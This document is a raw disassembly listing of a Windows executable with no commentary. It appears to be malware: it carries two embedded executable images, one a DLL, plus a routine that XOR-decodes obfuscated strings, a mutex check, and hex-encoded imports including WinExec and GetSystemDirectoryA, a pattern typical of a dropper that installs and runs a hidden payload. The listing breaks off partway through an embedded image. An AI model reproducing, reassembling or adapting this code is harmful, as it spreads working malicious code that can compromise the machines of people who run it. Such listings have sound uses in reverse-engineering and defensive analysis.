aTzT6 db 'tz|&>T6',0 ; DATA XREF: sub_402A4D+17B�o
word_43C133 dw 82h ; DATA XREF: sub_402A4D+1D3�r
aLj0yrfp db 'lJ0YrFP',0 ; DATA XREF: sub_402A4D+2C0�o
word_43C13D dw 5Eh ; DATA XREF: sub_402A4D+370�r
byte_43C13F db 2Dh ; DATA XREF: sub_402A4D+722�o
db 64h, 0
dword_43C142 dd 204359h ; DATA XREF: sub_402A4D+746�r
aLvdw_x db 'LVDW.X',0 ; DATA XREF: sub_402A4D+761�o
dword_43C14D dd 4B5258h ; DATA XREF: sub_402A4D+829�r
align 4
dd 3, 10h
dword_43C15C dd 6 ; DATA XREF: sub_4032E7+F�r
; sub_4032E7:loc_403316�r ...
dword_43C160 dd 30643C7Fh ; DATA XREF: sub_403383+F�o
db 0
byte_43C165 db 49h, 69h, 0 ; DATA XREF: sub_403383+4F�o
dword_43C168 dd 3D7258h ; DATA XREF: sub_403449+11�r
aOqd db ' OQD',0 ; DATA XREF: sub_403449+3C�o
aR6 db 'R6',0 ; DATA XREF: sub_4034D8+19�o
dd 5
dword_43C178 dd 0Bh ; DATA XREF: sub_403610+32�r
dword_43C17C dd 0 ; DATA XREF: sub_40357C+15�r
; sub_40357C:loc_4035AA�r ...
word_43C180 dw 68h ; DATA XREF: sub_403610+18�r
word_43C182 dw 0 ; DATA XREF: sub_4036F2+11�o
dd 1, 0Dh
dword_43C18C dd 0 ; DATA XREF: sub_40375C+15�r
; sub_40375C:loc_40378A�r ...
byte_43C190 db 3Eh, 80h, 0 ; DATA XREF: sub_4037EF+17�o
word_43C193 dw 2Fh ; DATA XREF: sub_4037EF+33�r
aH8me db 'H8mE',0 ; DATA XREF: .text:0040389F�o
align 10h
dd 0Eh
dword_43C1A4 dd 0E5h ; DATA XREF: sub_403936+15�r
; sub_403936:loc_40396B�r ...
dword_43C1A8 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 ; DATA XREF: sub_403C5F+2D9�o
dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
dd 210E00E0h, 3702010Bh, 800h, 0C00h, 1000h, 1190h, 1000h
dd 2000h, 10000000h, 1000h, 200h, 1, 0
dd 4, 0
dd 8000h, 400h, 0
dd 2, 100000h, 1000h, 100000h, 1000h, 0
dd 10h, 7000h, 48h, 5000h, 37Ch, 6 dup(0)
dd 6000h, 0DCh, 3000h, 54h, 12h dup(0)
a_text db '.text',0
align 4
db '¼',7,0
align 4
dd 1000h, 7BCh, 400h, 3 dup(0)
dd 60000020h, 7373622Eh, 0
dd 0FE0h, 2000h, 5 dup(0)
dd 0C0000080h, 6164722Eh, 6174h, 54h, 3000h, 54h, 0C00h
dd 3 dup(0)
dd 40000020h, 7461642Eh, 61h, 0C4h, 4000h, 0C4h, 0E00h
dd 3 dup(0)
dd 0C0000040h, 6164692Eh, 6174h, 37Ch, 5000h, 37Ch, 1000h
dd 3 dup(0)
dd 0C0000060h, 6C65722Eh, 636Fh, 0E4h, 6000h, 0E4h, 1600h
dd 3 dup(0)
dd 2000020h, 6164652Eh, 6174h, 48h, 7000h, 48h, 1800h
dd 3 dup(0)
dd 40000020h, 5Ch dup(0)
dd 8B40C031h, 0F704244Ch, 60441h, 0F740000h, 824448Bh
dd 1024548Bh, 3B80289h, 0C3000000h
; =============== S U B R O U T I N E =======================================
sub_43C5C8 proc near ; CODE XREF: .data:0043C6F0�p
; .data:0043C71E�p
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push 10001000h
push large dword ptr fs:0
mov large fs:0, esp
loc_43C5E5: ; CODE XREF: sub_43C5C8+44�j
; sub_43C5C8+4A�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_43C614
cmp esi, [esp+1Ch+arg_4]
jz short loc_43C614
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov ecx, [esp+1Ch+var_14]
mov ecx, [eax+0Ch]
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_43C5E5
call dword ptr [ebx+esi*4+8]
jmp short loc_43C5E5
; ---------------------------------------------------------------------------
loc_43C614: ; CODE XREF: sub_43C5C8+2A�j
; sub_43C5C8+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_43C5C8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C622 proc near ; CODE XREF: .data:0043C6E3�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push 10001092h
push [ebp+arg_0]
call sub_43CCBC
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_43C622 endp
; ---------------------------------------------------------------------------
db 0FCh
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
mov ebx, [ebp+0Ch]
mov eax, [ebp+8]
test dword ptr [eax+4], 6
jnz loc_43C717
mov [ebp-8], eax
mov eax, [ebp+10h]
mov [ebp-4], eax
lea eax, [ebp-8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_43C675: ; CODE XREF: .data:0043C70E�j
cmp esi, 0FFFFFFFFh
jz loc_43C726
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_43C705
push esi
push ebp
lea ebp, [ebx+10h]
mov eax, [ebp-14h]
mov eax, [eax]
mov eax, [eax]
mov ds:10004034h, eax
mov edx, [ebp-14h]
mov eax, [edx]
mov ds:10004038h, eax
mov eax, [edx+4]
mov ds:1000403Ch, eax
push esi
push edi
push ecx
mov ecx, 14h
lea edi, ds:10004040h
mov esi, ds:10004038h
rep movsd
lea edi, ds:10004040h
mov ds:10004038h, edi
pop ecx
pop edi
pop esi
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+0Ch]
or eax, eax
jz short loc_43C705
js short loc_43C713
mov edi, [ebx+8]
push ebx
call sub_43C622
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_43C5C8
add esp, 8
lea ecx, [esi+esi*2]
mov eax, [edi+ecx*4]
mov eax, [ebx+0Ch]
call dword ptr [edi+ecx*4+8]
loc_43C705: ; CODE XREF: .data:0043C686�j
; .data:0043C6DB�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp loc_43C675
; ---------------------------------------------------------------------------
loc_43C713: ; CODE XREF: .data:0043C6DD�j
xor eax, eax
jmp short loc_43C730
; ---------------------------------------------------------------------------
loc_43C717: ; CODE XREF: .data:0043C65A�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_43C5C8
add esp, 0Ch
loc_43C726: ; CODE XREF: .data:0043C678�j
push 0Bh
call sub_43CD28
add esp, 4
loc_43C730: ; CODE XREF: .data:0043C715�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
cmp dword ptr [ebp+0Ch], 1
jnz short loc_43C749
call sub_43C76C
loc_43C749: ; CODE XREF: .data:0043C742�j
call sub_43CC1B
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
mov eax, ds:10004000h
call eax
pop edi
pop esi
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
db 0B8h, 1, 0
dd 0F2EB0000h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C76C proc near ; CODE XREF: .data:0043C744�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push edi
push 0
push 0FFFFFFF6h
call sub_43CCE0
mov [ebp+var_8], eax
push 0
push 0FFFFFFF5h
call sub_43CCE0
mov [ebp+var_4], eax
push 0
push 0FFFFFFF4h
call sub_43CCE0
mov [ebp+var_C], eax
push 1000401Eh
push [ebp+var_8]
call sub_43CCD4
mov ds:10004008h, eax
push 1000401Ch
push [ebp+var_4]
call sub_43CCD4
mov ds:10004004h, eax
push 1000401Ch
push [ebp+var_C]
call sub_43CCD4
add esp, 30h
mov ds:1000400Ch, eax
mov edi, ds:10004004h
or edi, edi
jz short loc_43C7E5
push 0
push edi
call sub_43CD34
add esp, 8
loc_43C7E5: ; CODE XREF: sub_43C76C+6C�j
mov edi, ds:1000400Ch
or edi, edi
jz short loc_43C7FF
push 0
push edi
call sub_43CD34
add esp, 8
call sub_43C804
loc_43C7FF: ; CODE XREF: sub_43C76C+81�j
pop edi
leave
retn
sub_43C76C endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C804 proc near ; CODE XREF: sub_43C76C+8E�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp+var_C], 0
call sub_43CC50
mov ebx, eax
mov [ebp+var_10], ebx
jmp short loc_43C841
; ---------------------------------------------------------------------------
loc_43C820: ; CODE XREF: sub_43C804+45�j
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43C82D
inc [ebp+var_C]
loc_43C82D: ; CODE XREF: sub_43C804+24�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
lea ebx, [ebx+edi]
loc_43C841: ; CODE XREF: sub_43C804+1A�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43C820
mov edi, [ebp+var_C]
inc edi
lea edi, ds:0[edi*4]
mov [ebp+var_14], edi
push [ebp+var_14]
call sub_43CD04
pop ecx
mov [ebp+var_8], eax
mov ds:10004010h, eax
cmp [ebp+var_8], 0
jnz short loc_43C874
xor eax, eax
jmp short loc_43C8EA
; ---------------------------------------------------------------------------
loc_43C874: ; CODE XREF: sub_43C804+6A�j
mov ebx, [ebp+var_10]
jmp short loc_43C8CD
; ---------------------------------------------------------------------------
loc_43C879: ; CODE XREF: sub_43C804+D1�j
mov edi, ebx
xor eax, eax
stc
sbb ecx, ecx
repne scasb
neg ecx
lea eax, [ecx-2]
mov edi, eax
inc edi
mov [ebp+var_4], edi
cmp byte ptr ds:0[ebx], 3Dh
jz short loc_43C8C7
push [ebp+var_4]
call sub_43CD04
pop ecx
mov esi, [ebp+var_8]
mov ds:0[esi], eax
or eax, eax
jnz short loc_43C8B0
jmp short loc_43C8EA
; ---------------------------------------------------------------------------
loc_43C8B0: ; CODE XREF: sub_43C804+A8�j
push ebx
mov edi, [ebp+var_8]
push dword ptr ds:0[edi]
call sub_43CD58
add esp, 8
add [ebp+var_8], 4
loc_43C8C7: ; CODE XREF: sub_43C804+91�j
mov edx, [ebp+var_4]
lea ebx, [ebx+edx]
loc_43C8CD: ; CODE XREF: sub_43C804+73�j
cmp byte ptr ds:0[ebx], 0
jnz short loc_43C879
mov edx, [ebp+var_8]
mov dword ptr ds:0[edx], 0
mov eax, 1
loc_43C8EA: ; CODE XREF: sub_43C804+6E�j
; sub_43C804+AA�j
pop edi
pop esi
pop ebx
leave
retn
sub_43C804 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C8F0 proc near ; CODE XREF: sub_43C99A+22�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
push edi
mov esi, [ebp+arg_4]
mov [ebp+var_4], 181h
push esi
push [ebp+arg_0]
mov eax, ds:10004098h
lea eax, ds:10002000h[eax]
push eax
call sub_43CD10
add esp, 0Ch
xor edi, edi
jmp short loc_43C939
; ---------------------------------------------------------------------------
loc_43C91F: ; CODE XREF: sub_43C8F0+4B�j
mov eax, ds:10004098h
add eax, edi
lea eax, ds:10002000h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D9h
mov [eax], dl
inc edi
loc_43C939: ; CODE XREF: sub_43C8F0+2D�j
cmp edi, esi
jl short loc_43C91F
mov [ebp+var_8], 389h
mov eax, ds:10004098h
add eax, esi
mov byte ptr ds:10002000h[eax], 0
xor edi, edi
mov edi, ds:10004098h
add dword ptr ds:10004098h, 3
mov eax, ds:10004098h
lea eax, [eax+esi+4]
mov ds:10004098h, eax
inc dword ptr ds:10004098h
cmp dword ptr ds:10004098h, 0DB6h
jle short loc_43C989
and dword ptr ds:10004098h, 0
loc_43C989: ; CODE XREF: sub_43C8F0+90�j
mov [ebp+var_C], 9Ch
lea eax, [edi+10002000h]
pop edi
pop esi
leave
retn
sub_43C8F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C99A proc near ; CODE XREF: .data:0043CB33�p
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
var_5 = byte ptr -5
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
lea edi, [ebp+var_5]
lea esi, ds:1000409Ch
xor ecx, ecx
inc ecx
rep movsb
call sub_43CC8C
push 5
push 100040BDh
call sub_43C8F0
add esp, 8
push eax
push 0
push 1F0001h
call sub_43CCB0
mov [ebp+var_4], eax
or eax, eax
jz short loc_43C9F5
mov [ebp+var_C], 4FA1h
inc [ebp+var_C]
push eax
call sub_43CC68
mov [ebp+var_E], 6C6Dh
inc [ebp+var_E]
xor eax, eax
inc eax
loc_43C9F5: ; CODE XREF: sub_43C99A+3C�j
pop edi
pop esi
leave
retn
sub_43C99A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43C9F9 proc near ; CODE XREF: .data:0043CB67�p
var_10A = byte ptr -10Ah
var_6 = word ptr -6
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
call sub_43CC44
call sub_43CC74
mov ecx, edi
or eax, 0FFFFFFFFh
loc_43CA17: ; CODE XREF: sub_43C9F9+23�j
inc eax
cmp byte ptr [ecx+eax], 0
jnz short loc_43CA17
mov ebx, eax
mov [ebp+var_6], bx
mov ax, [ebp+var_6]
mov [ebp+var_2], ax
jmp short loc_43CA4C
; ---------------------------------------------------------------------------
loc_43CA2E: ; CODE XREF: sub_43C9F9+59�j
movzx eax, [ebp+var_2]
cmp byte ptr [edi+eax], 5Ch
jnz short loc_43CA48
call sub_43CC38
inc [ebp+var_2]
call sub_43CC8C
jmp short loc_43CA54
; ---------------------------------------------------------------------------
loc_43CA48: ; CODE XREF: sub_43C9F9+3D�j
dec [ebp+var_2]
loc_43CA4C: ; CODE XREF: sub_43C9F9+33�j
movzx eax, [ebp+var_2]
or eax, eax
jg short loc_43CA2E
loc_43CA54: ; CODE XREF: sub_43C9F9+4D�j
mov ax, [ebp+var_2]
cmp ax, [ebp+var_6]
jnb short loc_43CA92
mov [ebp+var_4], 0
jmp short loc_43CA80
; ---------------------------------------------------------------------------
loc_43CA66: ; CODE XREF: sub_43C9F9+97�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_2]
mov ecx, eax
add ecx, edx
mov dl, [edi+ecx]
mov [ebp+eax+var_10A], dl
inc [ebp+var_4]
loc_43CA80: ; CODE XREF: sub_43C9F9+6B�j
movzx eax, [ebp+var_4]
movzx edx, [ebp+var_6]
movzx ecx, [ebp+var_2]
sub edx, ecx
cmp eax, edx
jle short loc_43CA66
loc_43CA92: ; CODE XREF: sub_43C9F9+63�j
mov esi, 6BBCh
add esi, 7D41h
lea eax, [ebp+var_10A]
push eax
call sub_43CCA4
call sub_43CC98
pop edi
pop esi
pop ebx
leave
retn
sub_43C9F9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_43CAB3 proc near ; CODE XREF: .data:0043CBBA�p
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
call sub_43CC44
push 100040BBh
push [ebp+arg_0]
call sub_43CD4C
add esp, 8
lea edi, [ebp+var_8]
lea esi, ds:1000409Dh
movsd
movsd
pop edi
pop esi
leave
retn
sub_43CAB3 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 21Ch
push esi
push edi
mov ax, ds:100040A5h
mov [ebp-217h], ax
mov eax, ds:10004094h
add eax, 698h
push eax
call sub_43CD40
mov byte ptr [ebp-100h], 84h
sub byte ptr [ebp-100h], 68h
mov eax, ds:10004090h
mov edx, eax
add edx, 5
push edx
mov edx, 0Fh
sub edx, ds:10004094h
push edx
mov edx, 4
sub edx, eax
push edx
call sub_43C99A
add esp, 10h
or eax, eax
jz short loc_43CB47
xor eax, eax
inc eax
jmp loc_43CBF0
; ---------------------------------------------------------------------------
loc_43CB47: ; CODE XREF: .data:0043CB3D�j
push 104h
lea eax, [ebp-205h]
push eax
push dword ptr [ebp+8]
call sub_43CC5C
call sub_43CC44
lea eax, [ebp-205h]
push eax
call sub_43C9F9
mov byte ptr [ebp-101h], 1Bh
add byte ptr [ebp-101h], 1
lea edi, [ebp-215h]
lea esi, ds:100040A7h
mov ecx, 4
rep movsd
push 0FFh
lea eax, [ebp-0FFh]
push eax
call sub_43CC80
mov eax, ds:100040B7h
mov [ebp-21Bh], eax
call sub_43CC44
call sub_43CC38
lea eax, [ebp-0FFh]
push eax
call sub_43CAB3
call sub_43CC8C
lea eax, [ebp-215h]
push eax
lea eax, [ebp-0FFh]
push eax
call sub_43CD4C
add esp, 10h
push 1
lea eax, [ebp-0FFh]
push eax
call sub_43CCC8
call sub_43CC74
xor eax, eax
inc eax
loc_43CBF0: ; CODE XREF: .data:0043CB42�j
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 4
dd 243CD950h, 0F24048Bh, 82434BAh, 240C8166h
db 0, 2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CC1B
loc_43CC0A: ; CODE XREF: sub_43CC1B+D�j
fldcw word ptr [esp+4+var_4]
pop ecx
mov al, ah
and eax, 3
retn
; END OF FUNCTION CHUNK FOR sub_43CC1B
; ---------------------------------------------------------------------------
dd 243CD950h
db 58h, 0EBh, 0F3h
; =============== S U B R O U T I N E =======================================
sub_43CC1B proc near ; CODE XREF: .data:loc_43C749�p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043CC0A SIZE 0000000A BYTES
push eax
fnstcw word ptr [esp+4+var_4]
mov eax, [esp+4+var_4]
or word ptr [esp+4+var_4], 300h
jmp short loc_43CC0A
sub_43CC1B endp
; ---------------------------------------------------------------------------
align 4
dd 50E825FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC38 proc near ; CODE XREF: sub_43C9F9+3F�p
; .data:0043CBAE�p
jmp dword ptr ds:100050ECh
sub_43CC38 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC44 proc near ; CODE XREF: sub_43C9F9+F�p
; sub_43CAB3+7�p ...
jmp dword ptr ds:100050F0h
sub_43CC44 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC50 proc near ; CODE XREF: sub_43C804+10�p
jmp dword ptr ds:100050F4h
sub_43CC50 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC5C proc near ; CODE XREF: .data:0043CB56�p
jmp dword ptr ds:100050F8h
sub_43CC5C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC68 proc near ; CODE XREF: sub_43C99A+49�p
jmp dword ptr ds:100050FCh
sub_43CC68 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC74 proc near ; CODE XREF: sub_43C9F9+14�p
; .data:0043CBE8�p
jmp dword ptr ds:10005100h
sub_43CC74 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC80 proc near ; CODE XREF: .data:0043CB99�p
jmp dword ptr ds:10005104h
sub_43CC80 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC8C proc near ; CODE XREF: sub_43C99A+16�p
; sub_43C9F9+48�p ...
jmp dword ptr ds:10005108h
sub_43CC8C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CC98 proc near ; CODE XREF: sub_43C9F9+B0�p
jmp dword ptr ds:1000510Ch
sub_43CC98 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCA4 proc near ; CODE XREF: sub_43C9F9+AB�p
jmp dword ptr ds:10005110h
sub_43CCA4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCB0 proc near ; CODE XREF: sub_43C99A+32�p
jmp dword ptr ds:10005114h
sub_43CCB0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCBC proc near ; CODE XREF: sub_43C622+13�p
jmp dword ptr ds:10005118h
sub_43CCBC endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCC8 proc near ; CODE XREF: .data:0043CBE3�p
jmp dword ptr ds:1000511Ch
sub_43CCC8 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCD4 proc near ; CODE XREF: sub_43C76C+33�p
; sub_43C76C+45�p ...
jmp dword ptr ds:10005128h
sub_43CCD4 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CCE0 proc near ; CODE XREF: sub_43C76C+B�p
; sub_43C76C+17�p ...
jmp dword ptr ds:1000512Ch
sub_43CCE0 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 513025FFh, 90901000h, 0
dd 513425FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD04 proc near ; CODE XREF: sub_43C804+58�p
; sub_43C804+96�p
jmp dword ptr ds:10005138h
sub_43CD04 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD10 proc near ; CODE XREF: sub_43C8F0+23�p
jmp dword ptr ds:1000513Ch
sub_43CD10 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
dd 514025FFh, 90901000h, 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD28 proc near ; CODE XREF: .data:0043C728�p
jmp dword ptr ds:10005144h
sub_43CD28 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD34 proc near ; CODE XREF: sub_43C76C+71�p
; sub_43C76C+86�p
jmp dword ptr ds:10005148h
sub_43CD34 endp
; ---------------------------------------------------------------------------
dw 9090h
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD40 proc near ; CODE XREF: .data:0043CB01�p
jmp dword ptr ds:1000514Ch
sub_43CD40 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD4C proc near ; CODE XREF: sub_43CAB3+14�p
; .data:0043CBD2�p
jmp dword ptr ds:10005150h
sub_43CD4C endp
; ---------------------------------------------------------------------------
dw 9090h
align 8
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_43CD58 proc near ; CODE XREF: sub_43C804+B7�p
jmp dword ptr ds:10005154h
sub_43CD58 endp
; ---------------------------------------------------------------------------
dw 9090h
dd 14h dup(0)
dd 2 dup(1), 7Ch dup(0)
dd 10001536h, 5 dup(0)
dd 7325h, 720077h, 1Ch dup(0)
dd 2, 0Ch, 0
dd 3B4E2A00h, 734D3E5Ah
db 0, 4Bh, 0
aMjanfj32 db 'Mjanfj32',0 ; DATA XREF: sub_403C5F+2C0�o
aJklmno db 'jklmno',0
aAy db 'Ay&',0
db '\',0
aTtii db 'ė»',0
align 4
dd 4Fh dup(0)
dd 5070h, 2 dup(0)
dd 52F8h, 50E8h, 50B0h, 2 dup(0)
dd 5340h, 5128h, 12h dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 2 dup(0)
dd 515Ch, 516Ch, 5184h, 519Ch, 51B8h, 51D0h, 51E0h, 51F4h
dd 520Ch, 521Ch, 522Ch, 5240h, 5250h, 525Ch, 2 dup(0)
dd 5268h, 5274h, 5288h, 5294h, 52A0h, 52ACh, 52B8h, 52C4h
dd 52CCh, 52D8h, 52E0h, 52ECh, 0
dd 78450081h, 72507469h, 7365636Fh, 73h, 654700DEh, 72754374h
dd 746E6572h, 636F7250h, 49737365h, 64h, 654700E0h, 72754374h
dd 746E6572h, 65726854h, 64496461h, 0
dd 654700EDh, 766E4574h, 6E6F7269h, 746E656Dh, 69727453h
dd 4173676Eh, 0
dd 6547010Ah, 646F4D74h, 46656C75h, 4E656C69h, 41656D61h
dd 0
dd 6C43001Bh, 4865736Fh, 6C646E61h, 65h, 65470124h, 6F725074h
dd 73736563h, 70616548h, 0
dd 6547013Fh, 73795374h, 446D6574h, 63657269h, 79726F74h
dd 41h, 65470155h, 63695474h, 756F436Bh, 746Eh, 6547015Ch
dd 72655674h, 6E6F6973h, 0
dd 6C470168h, 6C61626Fh, 41646441h, 416D6F74h, 0
dd 704F01D2h, 754D6E65h, 41786574h, 0
dd 7452020Eh, 776E556Ch, 646E69h, 69570298h, 6578456Eh
dd 63h, 665F0080h, 65706F64h, 6Eh, 6F5F014Fh, 5F6E6570h
dd 6866736Fh, 6C646E61h, 65h, 6366020Dh, 65736F6Ch, 0
dd 635F0039h, 74697865h, 0
dd 616D024Eh, 636F6C6Ch, 0
dd 656D0254h, 7970636Dh, 0
dd 7270025Bh, 66746E69h, 0
dd 61720260h, 657369h, 65730267h, 66756274h, 0
dd 7273026Fh, 646E61h, 74730271h, 74616372h, 0
dd 74730275h, 79706372h, 0
aKernel32_dll_0 db 'KERNEL32.DLL',0
align 10h
dd 0Eh dup(10005000h), 44545243h, 442E4C4Ch, 4C4Ch, 0Ch dup(10005014h)
dd 22h dup(0)
dd 20h, 0
dd 20h, 1000h, 1800h, 2000h, 2C00h, 78h dup(0)
dd 1000h, 94h, 3086302Bh, 30F730EDh, 310D30FFh, 311B3113h
dd 31B03121h, 31FD31F0h, 320F3202h, 32243214h, 323F322Ah
dd 335F32BEh, 33783366h, 339D3381h, 33AF33A6h, 33BB33B5h
dd 33CA33C4h, 33DC33D0h, 33FF33EAh, 35183410h, 3543352Ch
dd 356D354Fh, 35DA357Eh, 368635F7h, 369E3692h, 36B636AAh
dd 36CE36C2h, 36E636DAh, 36FE36F2h, 3716370Ah, 372E3722h
dd 3746373Ah, 375E3752h, 3776376Ah, 378E3782h, 37A6379Ah
dd 37B2h, 4000h, 0Ch, 3000h, 5000h, 3Ch, 330C3308h, 33143310h
dd 331C3318h, 33243320h, 332C3328h, 33343330h, 333C3338h
dd 3350334Ch, 33583354h, 3360335Ch, 33683364h, 3370336Ch
dd 33783374h, 4Ah dup(0)
aB db 0Ah
db 'µ|B',0
align 4
aP_0 db '(p',0
align 4
dd 3 dup(1), 7030h, 7034h, 7038h, 2E6C6C64h, 6C6C64h, 1536h
dd 703Ch, 0
a_libmain@12 db '_LibMain@12',0
dd 6Eh dup(0)
db 0
byte_43DBA9 db 4Dh, 5Ah, 90h ; DATA XREF: sub_403AA3+10B�o
dd 300h, 400h, 0FFFF00h, 0B800h, 0
dd 4000h, 8 dup(0)
dd 8000h, 0BA1F0E00h, 9B4000Eh, 1B821CDh, 5421CD4Ch, 20736968h
dd 676F7270h, 206D6172h, 6E6E6163h, 6220746Fh, 75722065h
dd 6E69206Eh, 534F4420h, 646F6D20h, 0D0D2E65h, 240Ah, 0
dd 455000h, 4014C00h, 7CA9DF00h, 42h, 0
dd 0E00E000h, 2010B01h, 1A0037h, 180000h, 20000h, 121900h
dd 100000h, 300000h, 40000000h, 100000h, 20000h, 100h
dd 0
dd 400h, 0
dd 600000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 500000h, 97000h, 1Ch dup(0)
dd 65742E00h, 7478h, 19A400h, 100000h, 19A400h, 40000h
dd 3 dup(0)
